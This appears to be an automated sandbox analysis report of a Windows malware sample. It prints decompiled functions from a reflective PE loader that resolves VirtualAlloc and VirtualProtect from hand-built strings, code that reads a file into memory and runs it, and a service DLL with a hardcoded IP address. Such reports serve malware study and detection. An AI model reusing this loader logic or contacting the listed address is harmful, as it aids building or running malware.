SetPriorityClass.KERNELBASE(00000000,00000080), ref: 1000BD93
CloseHandle.KERNEL32(00000000), ref: 1000BD9A
ExitProcess.KERNEL32 ref: 1000BDC2

Part of subcall function 10002506: strlen.MSVCRT ref: 10002522
Part of subcall function 10002506: PathFileExistsA.KERNELBASE(?,?,?,?,?,?,100029D2,00000000,1000BDED), ref: 1000253A
Part of subcall function 10002506: ExitProcess.KERNEL32 ref: 10002548

ExitProcess.KERNEL32 ref: 1000BDDA

Strings

103.119.44.216, xrefs: 1000BB5E, 1000BCAA, 1000BCB1, 1000BCBA
Fatal, xrefs: 1000BB56, 1000BC92, 1000BC98, 1000BCA1
422413711, xrefs: 1000BB69, 1000BC75, 1000BC7B, 1000BC89
Vwxyab Defghijk Mnopqrst Vwxy, xrefs: 1000BBA9, 1000BD23, 1000BD29, 1000BD32
%SystemRoot%\, xrefs: 1000BB85, 1000BCDB, 1000BCE1, 1000BCEA
Vwxyab.exe, xrefs: 1000BB90, 1000BCF3, 1000BCF9, 1000BD02
Vwxyab Defghijk, xrefs: 1000BB9B, 1000BD0C, 1000BD11, 1000BD1A
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000BBB6, 1000BBBC, 1000BD3C, 1000BD45

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strlen$lstrcpy$Process$CurrentExit$CloseMessageOpenProtectThreadTokenVirtual$#823AdjustChangeClassExistsFileFindHandleInputLookupNotificationPathPostPriorityPrivilegePrivilegesStateValuememcpy
String ID: %SystemRoot%\$103.119.44.216$422413711$Fatal$Vwxyab Defghijk$Vwxyab Defghijk Mnopqrst Vwxy$Vwxyab.exe$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 1629496975-885303589
Opcode ID: c349b4b7b8516f17e06a902e7c3ca144479fd2e94ec379eaa4148ff351d79b72
Instruction ID: 4de237f808fd3003401a8b03b92753f0abea1db7399b3fc2f2e1c5df8427a99e
Opcode Fuzzy Hash: c349b4b7b8516f17e06a902e7c3ca144479fd2e94ec379eaa4148ff351d79b72
Instruction Fuzzy Hash: E6A15475801A64AFF321EB74DC89DDB7BECFF49290B600069F94DD2255EB306A42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00403140, Relevance: 64.9, APIs: 6, Strings: 31, Instructions: 137
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00403140(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				_Unknown_base(*)()* _t85;
				signed char _t87;
				void* _t96;
				signed int _t103;
				signed int _t109;
				signed int _t114;
				intOrPtr* _t120;
				void* _t121;
				unsigned int _t123;
				long _t124;
				void* _t126;
				void* _t127;
				signed char* _t128;
				intOrPtr _t130;
				signed int _t132;

				_t79 =  *0x44f5d0; // 0x8e7de579
				 *(_t132 + 0x3c) = _t79 ^ _t132;
				_t120 = __ecx;
				 *((char*)(_t132 + 0x21)) = 0x45;
				 *(_t132 + 0x24) = 0x45;
				_t82 =  *__ecx;
				 *((char*)(_t132 + 0x20)) = 0x4b;
				 *((char*)(_t132 + 0x22)) = 0x52;
				 *((char*)(_t132 + 0x23)) = 0x4e;
				 *((char*)(_t132 + 0x25)) = 0x4c;
				 *((char*)(_t132 + 0x26)) = 0x33;
				 *((char*)(_t132 + 0x27)) = 0x32;
				 *((char*)(_t132 + 0x28)) = 0x2e;
				 *((char*)(_t132 + 0x29)) = 0x64;
				 *((char*)(_t132 + 0x2a)) = 0x6c;
				 *((char*)(_t132 + 0x2b)) = 0x6c;
				 *((char*)(_t132 + 0x2c)) = 0;
				_t111 = _t132 + 0x30;
				_t126 = ( *( *__ecx + 0x14) & 0x0000ffff) + _t82 + 0x18;
				 *((intOrPtr*)(_t132 + 0x20)) = __ecx;
				 *((char*)(_t132 + 0x38)) = 0x56;
				 *((char*)(_t132 + 0x39)) = 0x69;
				 *((char*)(_t132 + 0x3a)) = 0x72;
				 *((char*)(_t132 + 0x3b)) = 0x74;
				 *(_t132 + 0x3c) = 0x75;
				 *((char*)(_t132 + 0x3d)) = 0x61;
				 *((char*)(_t132 + 0x3e)) = 0x6c;
				 *((char*)(_t132 + 0x3f)) = 0x46;
				 *((char*)(_t132 + 0x40)) = 0x72;
				 *((char*)(_t132 + 0x41)) = 0x65;
				 *((char*)(_t132 + 0x42)) = 0x65;
				 *((char*)(_t132 + 0x43)) = 0;
				_t85 = GetProcAddress(LoadLibraryA(_t132 + 0x24), _t132 + 0x30);
				_t130 =  *_t120;
				 *(_t132 + 0x14) = _t85;
				 *(_t132 + 0x10) = 0;
				if( *(_t130 + 6) <= 0) {
					L15:
					_pop(_t121);
					_pop(_t127);
					_pop(_t96);
					return E0042569C(_t85, _t96,  *(_t132 + 0x4c) ^ _t132, _t111, _t121, _t127);
				}
				_t128 = _t126 + 0x24;
				do {
					_t87 =  *_t128;
					_t103 = _t87 >> 0x0000001d & 0x00000001;
					_t114 = _t87 >> 0x0000001e & 0x00000001;
					_t123 = _t87 >> 0x1f;
					if((_t87 & 0x02000000) == 0) {
						__eflags = _t87 & 0x04000000;
						_t124 =  *(0x450914 + (_t123 + (_t114 + _t103 * 2) * 2) * 4);
						if((_t87 & 0x04000000) != 0) {
							_t124 = _t124 | 0x00000200;
							__eflags = _t124;
						}
						__eflags =  *(_t128 - 0x14);
						if(__eflags != 0) {
							L12:
							if(__eflags > 0) {
								 *((char*)(_t132 + 0x44)) = 0x56;
								 *((char*)(_t132 + 0x45)) = 0x69;
								 *((char*)(_t132 + 0x46)) = 0x72;
								 *((char*)(_t132 + 0x47)) = 0x74;
								 *((char*)(_t132 + 0x48)) = 0x75;
								 *((char*)(_t132 + 0x49)) = 0x61;
								 *((char*)(_t132 + 0x4a)) = 0x6c;
								 *((char*)(_t132 + 0x4b)) = 0x50;
								 *(_t132 + 0x4c) = 0x72;
								 *((char*)(_t132 + 0x4d)) = 0x6f;
								 *((char*)(_t132 + 0x4e)) = 0x74;
								 *((char*)(_t132 + 0x4f)) = 0x65;
								 *((char*)(_t132 + 0x50)) = 0x63;
								 *((char*)(_t132 + 0x51)) = 0x74;
								 *((char*)(_t132 + 0x52)) = 0;
								GetProcAddress(LoadLibraryA(_t132 + 0x24), _t132 + 0x3c);
								VirtualProtect( *(_t128 - 0x1c),  *(_t128 - 0x14), _t124, _t132 + 0x1c); // executed
							}
							goto L14;
						} else {
							__eflags = _t87 & 0x00000040;
							if((_t87 & 0x00000040) == 0) {
								__eflags = _t87;
								if(_t87 >= 0) {
									goto L14;
								}
								_t109 =  *(_t130 + 0x24);
								L11:
								__eflags = _t109;
								goto L12;
							}
							_t109 =  *(_t130 + 0x20);
							goto L11;
						}
					}
					VirtualFree( *(_t128 - 0x1c),  *(_t128 - 0x14), 0x4000);
					L14:
					_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))));
					_t111 =  *(_t130 + 6) & 0x0000ffff;
					_t85 =  *(_t132 + 0x10) + 1;
					_t128 =  &(_t128[0x28]);
					 *(_t132 + 0x10) = _t85;
				} while (_t85 < ( *(_t130 + 6) & 0x0000ffff));
				goto L15;
			}

APIs

LoadLibraryA.KERNEL32 ref: 004031EA
GetProcAddress.KERNEL32(00000000), ref: 004031F1
VirtualFree.KERNELBASE(?,?,00004000), ref: 0040323E
LoadLibraryA.KERNEL32 ref: 004032CE
GetProcAddress.KERNEL32(00000000), ref: 004032D5
VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 004032E9

Strings

r, xrefs: 004031D6
o, xrefs: 004032B2
L, xrefs: 0040316F
i, xrefs: 0040328B
., xrefs: 0040317E
l, xrefs: 004032A3
u, xrefs: 00403299
e, xrefs: 004032BB
2, xrefs: 00403179
V, xrefs: 004031AF
c, xrefs: 004032C0
R, xrefs: 00403165
l, xrefs: 00403188
K, xrefs: 00403160
d, xrefs: 00403183
e, xrefs: 004031DB
V, xrefs: 00403286
r, xrefs: 004031B9
u, xrefs: 004031C2
N, xrefs: 0040316A
P, xrefs: 004032A8
F, xrefs: 004031D1
e, xrefs: 004031E0
r, xrefs: 00403290
a, xrefs: 004031C7
r, xrefs: 004032AD
l, xrefs: 004031CC
a, xrefs: 0040329E
i, xrefs: 004031B4
l, xrefs: 0040318D
3, xrefs: 00403174

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProcVirtual$FreeProtect
String ID: .$2$3$F$K$L$N$P$R$V$V$a$a$c$d$e$e$e$i$i$l$l$l$l$o$r$r$r$r$u$u
API String ID: 3873177194-742157370
Opcode ID: a98f27e7ffd4850d1b73dc38e316cacc3e96376bfd09aff315c911015ccc0366
Instruction ID: 0caa5cbf014bb98f41278f97c453236447b57da2c8002a1a4397e4c4787bb581
Opcode Fuzzy Hash: a98f27e7ffd4850d1b73dc38e316cacc3e96376bfd09aff315c911015ccc0366
Instruction Fuzzy Hash: F9516A7150C3C08EE311CB28C448B5BBFE56BA6709F48499DF1C85B282D7BAD618C76B

Uniqueness

Uniqueness Score: -1.00%

Function 00402FC0, Relevance: 40.4, APIs: 4, Strings: 19, Instructions: 112
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402FC0(intOrPtr __ecx, void* __ebp, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				char _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t57;
				intOrPtr* _t60;
				intOrPtr _t61;
				_Unknown_base(*)()* _t65;
				void* _t66;
				void* _t73;
				long _t79;
				void* _t90;
				void* _t91;
				intOrPtr _t92;
				void* _t94;
				void* _t95;
				long* _t96;
				signed int _t100;

				_t100 =  &_v56;
				_t57 =  *0x44f5d0; // 0x8e7de579
				_v4 = _t57 ^ _t100;
				_v48 = _a4;
				_t60 = _a8;
				_t85 =  *((intOrPtr*)(_t60 + 4));
				_v44 = _t60;
				_t61 =  *_t60;
				_v40 = __ecx;
				_v56 =  *((intOrPtr*)(_t60 + 4));
				_t94 = ( *(_t61 + 0x14) & 0x0000ffff) + _t61 + 0x18;
				_v52 = 0;
				if( *((short*)(_t61 + 6)) > 0) {
					_push(_t73);
					_push(_t90);
					_t96 = _t94 + 0x10;
					do {
						_v20 = 0x4b;
						_v19 = 0x45;
						_v18 = 0x52;
						_v17 = 0x4e;
						_v16 = 0x45;
						_v15 = 0x4c;
						_v14 = 0x33;
						_v13 = 0x32;
						_v12 = 0x2e;
						_v11 = 0x64;
						_v10 = 0x6c;
						_v9 = 0x6c;
						_v8 = 0;
						_v36 = 0x56;
						_v35 = 0x69;
						_v34 = 0x72;
						_v33 = 0x74;
						_v32 = 0x75;
						_v31 = 0x61;
						_v30 = 0x6c;
						_v29 = 0x41;
						_v28 = 0x6c;
						_v27 = 0x6c;
						_v26 = 0x6f;
						_v25 = 0x63;
						_v24 = 0;
						_t65 = GetProcAddress(LoadLibraryA( &_v20),  &_v36);
						_t79 =  *_t96;
						if(_t79 != 0) {
							_t66 = VirtualAlloc( *((intOrPtr*)(_t96 - 4)) + _v56, _t79, 0x1000, 4); // executed
							_t91 = _t66;
							E0042D2F0(0x6c, _t91, _t96, _t91, _t96[1] + _v48,  *_t96);
							 *(_t96 - 8) = _t91;
							goto L6;
						} else {
							_t92 =  *((intOrPtr*)(_v40 + 0x38));
							if(_t92 > 0) {
								 *(_t96 - 8) =  *_t65( *((intOrPtr*)(_t96 - 4)) + _v56, _t92, 0x1000, 4);
								E004277B0(_t92, _t71, 0, _t92);
								L6:
								_t100 = _t100 + 0xc;
							}
						}
						_t85 =  *_v44;
						_t61 = _v52 + 1;
						_t96 =  &(_t96[0xa]);
						_v52 = _t61;
					} while (_t61 < ( *( *_v44 + 6) & 0x0000ffff));
					_pop(_t90);
					_pop(_t73);
				}
				_pop(_t95);
				return E0042569C(_t61, _t73, _v4 ^ _t100, _t85, _t90, _t95);
			}

APIs

LoadLibraryA.KERNEL32 ref: 0040309C
GetProcAddress.KERNEL32(00000000), ref: 004030A3
_memset.LIBCMT ref: 004030CF
VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 004030E6

Strings

d, xrefs: 0040304C
3, xrefs: 0040303D
V, xrefs: 0040305E
i, xrefs: 00403063
a, xrefs: 00403077
R, xrefs: 00403029
N, xrefs: 0040302E
E, xrefs: 00403024
u, xrefs: 00403072
r, xrefs: 00403068
A, xrefs: 00403080
., xrefs: 00403047
L, xrefs: 00403038
t, xrefs: 0040306D
o, xrefs: 0040308D
E, xrefs: 00403033
c, xrefs: 00403092
2, xrefs: 00403042
K, xrefs: 0040301F

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAllocLibraryLoadProcVirtual_memset
String ID: .$2$3$A$E$E$K$L$N$R$V$a$c$d$i$o$r$t$u
API String ID: 598480529-2294417541
Opcode ID: 0346305e49535223c98f08fae48008f6d0e774064bb9e389ba55b5dfd58237fe
Instruction ID: 210cb88b31063c619ee7429017330827fc8e4f72e1ba1ec9c39bfc77634dc98e
Opcode Fuzzy Hash: 0346305e49535223c98f08fae48008f6d0e774064bb9e389ba55b5dfd58237fe
Instruction Fuzzy Hash: 1C411A7150D3809ED351CB28C884B1BBFE5AFD6708F88585DF5C84B282C2BAD948C767

Uniqueness

Uniqueness Score: -1.00%

Function 00403320, Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 146
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00403320(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				void* _t64;
				_Unknown_base(*)()* _t69;
				intOrPtr _t71;
				struct HINSTANCE__* _t73;
				intOrPtr _t77;
				signed int _t78;
				_Unknown_base(*)()* _t80;
				signed int _t82;
				signed int _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				void* _t87;
				signed int _t100;
				void* _t101;
				void* _t102;
				intOrPtr _t103;
				signed int* _t104;
				intOrPtr* _t107;
				void* _t108;
				void* _t109;
				signed int* _t110;
				intOrPtr* _t114;
				signed int _t117;
				signed int _t124;

				_t60 =  *0x44f5d0; // 0x8e7de579
				 *(_t117 + 0x2c) = _t60 ^ _t117;
				_t100 = __ecx;
				_t84 =  *(__ecx + 4);
				 *((char*)(_t117 + 0x29)) = 0x45;
				 *(_t117 + 0x2c) = 0x45;
				_t98 = 0x52;
				 *((char*)(_t117 + 0x32)) = 0x6c;
				 *((char*)(_t117 + 0x33)) = 0x6c;
				_t107 =  *((intOrPtr*)(__ecx)) + 0x80;
				 *((char*)(_t117 + 0x28)) = 0x4b;
				 *((char*)(_t117 + 0x2a)) = 0x52;
				 *((char*)(_t117 + 0x2b)) = 0x4e;
				 *((char*)(_t117 + 0x2d)) = 0x4c;
				 *((char*)(_t117 + 0x2e)) = 0x33;
				 *((char*)(_t117 + 0x2f)) = 0x32;
				 *(_t117 + 0x30) = 0x2e;
				 *((char*)(_t117 + 0x31)) = 0x64;
				 *((char*)(_t117 + 0x34)) = 0;
				 *(_t117 + 0x10) = __ecx;
				_t64 = 1;
				 *(_t117 + 0xc) = _t84;
				if( *((intOrPtr*)(_t107 + 4)) <= 0) {
					L18:
					_pop(_t101);
					_pop(_t108);
					_pop(_t85);
					return E0042569C(_t64, _t85,  *(_t117 + 0x38) ^ _t117, _t98, _t101, _t108);
				} else {
					 *((char*)(_t117 + 0x1f)) = 0x61;
					 *((char*)(_t117 + 0x23)) = 0x61;
					 *(_t117 + 0x20) = 0x64;
					 *((char*)(_t117 + 0x24)) = 0x64;
					_t24 = _t117 + 0x30; // 0x2e
					 *((char*)(_t117 + 0x24)) = 0x49;
					 *((char*)(_t117 + 0x25)) = 0x73;
					 *((char*)(_t117 + 0x26)) = 0x42;
					 *((char*)(_t117 + 0x29)) = 0x52;
					 *((char*)(_t117 + 0x2a)) = 0x65;
					 *((char*)(_t117 + 0x2d)) = 0x50;
					 *((char*)(_t117 + 0x2e)) = 0x74;
					 *((char*)(_t117 + 0x2f)) = 0x72;
					 *(_t117 + 0x30) = 0;
					_t69 = GetProcAddress(LoadLibraryA(_t24), _t117 + 0x1c);
					_push(0x14);
					_t114 =  *_t107 + _t84;
					_push(_t114);
					 *(_t117 + 0x20) = _t69;
					if( *_t69() != 0) {
						L17:
						_t64 = 1;
						goto L18;
					} else {
						while(1) {
							_t71 =  *((intOrPtr*)(_t114 + 0xc));
							if(_t71 == 0) {
								goto L17;
							}
							_t73 = LoadLibraryA(_t71 + _t84); // executed
							_t86 = _t73;
							if(_t86 == 0xffffffff) {
								L16:
								_pop(_t102);
								_pop(_t109);
								_pop(_t87);
								return E0042569C(0, _t87,  *(_t117 + 0x2c) ^ _t117, _t98, _t102, _t109);
							} else {
								_t98 =  *(_t100 + 0xc);
								_t77 = E00402D10(_t114,  *((intOrPtr*)(_t100 + 8)), 4 +  *(_t100 + 0xc) * 4);
								_t117 = _t117 + 8;
								 *((intOrPtr*)(_t100 + 8)) = _t77;
								if(_t77 == 0) {
									goto L16;
								} else {
									_t98 =  *(_t100 + 0xc);
									 *(_t77 +  *(_t100 + 0xc) * 4) = _t86;
									 *(_t100 + 0xc) =  *(_t100 + 0xc) + 1;
									_t103 =  *_t114;
									if(_t103 == 0) {
										_t98 =  *(_t117 + 0x10);
										_t104 =  *((intOrPtr*)(_t114 + 0x10)) +  *(_t117 + 0x10);
										_t110 = _t104;
									} else {
										_t82 =  *(_t117 + 0x10);
										_t104 = _t103 + _t82;
										_t110 =  *((intOrPtr*)(_t114 + 0x10)) + _t82;
									}
									_t78 =  *_t104;
									_t124 = _t78;
									if(_t124 == 0) {
										L14:
										_push(0x14);
										_t114 = _t114 + 0x14;
										_push(_t114);
										if( *(_t117 + 0x20)() != 0) {
											goto L17;
										} else {
											_t100 =  *((intOrPtr*)(_t117 + 0x14));
											_t84 =  *(_t117 + 0x10);
											continue;
										}
									} else {
										L9:
										L9:
										if(_t124 >= 0) {
											_t53 =  *(_t117 + 0x10) + 2; // 0x2
											_t98 = _t78 + _t53;
											_push(_t78 + _t53);
										} else {
											_push(_t78 & 0x0000ffff);
										}
										_t80 = GetProcAddress(_t86, ??);
										 *_t110 = _t80;
										if(_t80 == 0) {
											goto L16;
										}
										_t78 = _t104[1];
										_t104 =  &(_t104[1]);
										_t110 =  &(_t110[1]);
										if(_t78 != 0) {
											goto L9;
										} else {
											goto L14;
										}
									}
								}
							}
							goto L19;
						}
						goto L17;
					}
				}
				L19:
			}

APIs

LoadLibraryA.KERNEL32(.23L,?), ref: 004033E1
GetProcAddress.KERNEL32(00000000), ref: 004033E8
LoadLibraryA.KERNELBASE(?,?,00000014), ref: 00403411

Part of subcall function 00402D10: LoadLibraryA.KERNEL32 ref: 00402DC1
Part of subcall function 00402D10: GetProcAddress.KERNEL32(00000000), ref: 00402DCA
Part of subcall function 00402D10: LoadLibraryA.KERNEL32(?,?), ref: 00402E14
Part of subcall function 00402D10: GetProcAddress.KERNEL32(00000000), ref: 00402E17
Part of subcall function 00402D10: LoadLibraryA.KERNEL32(?,.23L), ref: 00402E58
Part of subcall function 00402D10: GetProcAddress.KERNEL32(00000000), ref: 00402E5B

GetProcAddress.KERNEL32(00000000,00000002), ref: 00403484

Strings

s, xrefs: 004033BA
I, xrefs: 004033B5
e, xrefs: 004033C8
r, xrefs: 004033D7
K, xrefs: 00403356
B, xrefs: 004033BF
.23L, xrefs: 004033B0, 004033B4
t, xrefs: 004033D2
P, xrefs: 004033CD
N, xrefs: 0040335F

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .23L$B$I$K$N$P$e$r$s$t
API String ID: 2574300362-3392555607
Opcode ID: 29d237e436c54b2257fb4ddf0f711995b4f3234acbc02b9b4333de291fa6b537
Instruction ID: a91efa0748e9cab470246e31940816717a44cb7d165b95e41264eea58408d903
Opcode Fuzzy Hash: 29d237e436c54b2257fb4ddf0f711995b4f3234acbc02b9b4333de291fa6b537
Instruction Fuzzy Hash: 8E51617150C3819FD301CF28D84475BBBD4AF95308F444A6EF899AB382D779EA09C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 70
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403AE0(CHAR* _a4) {
				signed int _v4;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				long _v16;
				signed int _t11;
				void* _t14;
				void* _t16;
				intOrPtr* _t22;
				void* _t25;
				void* _t30;
				void* _t35;
				long _t37;
				void* _t43;
				signed int _t47;
				void* _t48;

				_t47 =  &_v16;
				_t11 =  *0x44f5d0; // 0x8e7de579
				_v4 = _t11 ^ _t47;
				_t14 = CreateFileA(_a4, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t43 = _t14;
				_t37 = GetFileSize(_t43, 0);
				_t16 = VirtualAlloc(0, _t37, 0x1000, 4); // executed
				_t30 = _t16;
				ReadFile(_t43, _t30, _t37,  &_v16, 0); // executed
				FindCloseChangeNotification(_t43); // executed
				E00403AC0(_t30, _t37);
				_t22 = E00403570(_t30, _t35, _t37, _t43);
				_t46 = _t22; // executed
				VirtualFree(_t30, 0, 0x8000); // executed
				if(_t22 != 0) {
					_push( &_v12);
					_v12 = 0x53;
					_v11 = 0x56;
					_v10 = 0x50;
					_v9 = 0x37;
					_v8 = 0;
					_t25 = E00403810(_t46);
					_t48 = _t47 + 4;
					if(_t25 != 0) {
						 *(memcpy(_t48 - 0x2a8, ").+,))!,**,()$", 0xaa << 2))(); // executed
					}
					E004038B0(_t46, _t46);
				}
				ExitProcess(0);
			}

APIs

CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00403B09
GetFileSize.KERNEL32(00000000,00000000), ref: 00403B14
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 00403B26
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 00403B38
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00403B3F
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00403B5D
ExitProcess.KERNEL32 ref: 00403BB2

Strings

V, xrefs: 00403B73
P, xrefs: 00403B78
7, xrefs: 00403B7D
).+,))!,**,()$, xrefs: 00403BA0
S, xrefs: 00403B6E

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocChangeCloseCreateExitFindFreeNotificationProcessReadSize
String ID: ).+,))!,**,()$$7$P$S$V
API String ID: 3111327123-3891380309
Opcode ID: f9d73fea26d4cac9f68b55999740ecba5f2e0803aecce9b1b65e3f9dfca6e4fd
Instruction ID: 8583e24197c12c077cdddf8a56e554f9e1de04c88ba3e0418f904589240653b2
Opcode Fuzzy Hash: f9d73fea26d4cac9f68b55999740ecba5f2e0803aecce9b1b65e3f9dfca6e4fd
Instruction Fuzzy Hash: ED2163716043416BE360AF75AC09F1B7ADC9B85B05F04447CB645AB2D2DAB4DA0887AE

Uniqueness

Uniqueness Score: -1.00%

Function 10002D9B, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 83
sleepregistrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10002D9B(void* __edi) {
				struct _OSVERSIONINFOA _v152;
				char _v412;
				char _v1436;
				int _t9;
				void* _t20;
				int _t24;
				void* _t28;
				intOrPtr _t42;

				_t9 = RegisterServiceCtrlHandlerA("Vwxyab Defghijk", E10002BB5);
				 *0x10026974 = _t9;
				if(_t9 != 0) {
					E10002B6D(2, 0, 1); // executed
					E10002B6D(4, 0, 0);
					_v152.dwOSVersionInfoSize = 0x94;
					GetVersionExA( &_v152);
					if(_v152.dwPlatformId == 2) {
						if(_v152.dwMajorVersion >= 6) {
							GetModuleFileNameA(0,  &_v412, 0x104);
							wsprintfA( &_v1436, "%s Win7",  &_v412);
							_t20 = E10003333( &_v1436); // executed
							CloseHandle(_t20);
						} else {
							_push(0);
							_t28 = E1000CCF9(0, 0, E1000B254(), 0, 0, 0);
							do {
								Sleep(0x64);
								_t24 =  *0x10026978; // 0x4
							} while (_t24 != 3 && _t24 != 1);
							WaitForSingleObject(_t28, 0xffffffff);
							CloseHandle(_t28);
							while(1) {
								L8:
								Sleep(0x64);
								_t9 =  *0x10026978; // 0x4
								if(_t9 == 3 || _t9 == 1) {
									goto L11;
								}
								_t42 =  *0x100275b0; // 0x0
								if(_t42 == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					goto L8;
				}
				L11:
				return _t9;
			}

0x10002daf
0x10002db7
0x10002dbe
0x10002dc9
0x10002dd2
0x10002de0
0x10002deb
0x10002df8
0x10002e05
0x10002e55
0x10002e6e
0x10002e7b
0x10002e84
0x10002e07
0x10002e08
0x10002e1c
0x10002e1e
0x10002e20
0x10002e26
0x10002e2b
0x10002e38
0x10002e3f
0x10002e8a
0x10002e8a
0x10002e8c
0x10002e92
0x10002e9a
0x00000000
0x00000000
0x10002ea1
0x10002ea7
0x00000000
0x00000000
0x00000000
0x10002ea7
0x00000000
0x10002e8a
0x10002e05
0x00000000
0x10002df8
0x10002eab
0x10002eab

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(Vwxyab Defghijk,Function_00002BB5), ref: 10002DAF

Part of subcall function 10002B6D: SetServiceStatus.SECHOST(00000020), ref: 10002BAD

GetVersionExA.KERNEL32(?), ref: 10002DEB
Sleep.KERNEL32(00000064), ref: 10002E20
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10002E38
CloseHandle.KERNEL32(00000000), ref: 10002E3F
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002E55
wsprintfA.USER32 ref: 10002E6E
CloseHandle.KERNEL32(00000000), ref: 10002E84

Part of subcall function 1000B254: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,00000000,1000BA88), ref: 1000B26F
Part of subcall function 1000B254: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,1000BA88), ref: 1000B276

Part of subcall function 1000CCF9: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000CD12
Part of subcall function 1000CCF9: _beginthreadex.MSVCRT ref: 1000CD30
Part of subcall function 1000CCF9: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000CD40
Part of subcall function 1000CCF9: FindCloseChangeNotification.KERNELBASE(?), ref: 1000CD49

Sleep.KERNELBASE(00000064), ref: 10002E8C

Strings

